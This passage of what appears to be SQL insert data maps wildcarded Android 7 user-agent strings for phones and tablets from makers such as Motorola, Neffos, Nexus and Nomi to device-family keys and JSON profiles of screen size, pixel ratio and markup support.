Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Micromax Q440) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Mint_M353) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Mix) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Mobicel_R6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto C Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto E (4) Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto E (4)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G (4)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G (5) Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G (5)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G (5S) Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G (5S)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G 2014) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto G4 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto X Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto Z (2)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Moto Z2 Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; MotoG3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Myria_FIVE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Myria_Grand_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N5001L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N5702L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N818S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N9517) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; N9560) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NEM-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NEM-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NEM-L51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NEXT P+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NOA N2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NOA_N5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NOA_N8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NOA_Stilo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NOS NOVU III) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NOTE Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NS5002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NS5005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NS5502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NUU_M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NUU_M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NUU_X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX531J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX563J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX589J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX591J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX595J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":680,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX612J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NX907J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Navon_Infinity) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos C5a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos C5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos C7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos N1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos X1 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos X1 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos Y5 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos Y5L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos Y5i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos Y5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos Y6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Neffos Y7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; NextSE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nexus 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nexus 5X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nexus 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nexus 6P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nexus 9) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nitro 55N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nokia 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nomi i6030) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nomi_C070012) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nomi_C070030) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nomi_i5001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Nomi_i5511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Notrino) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OC106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; OK-smart15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 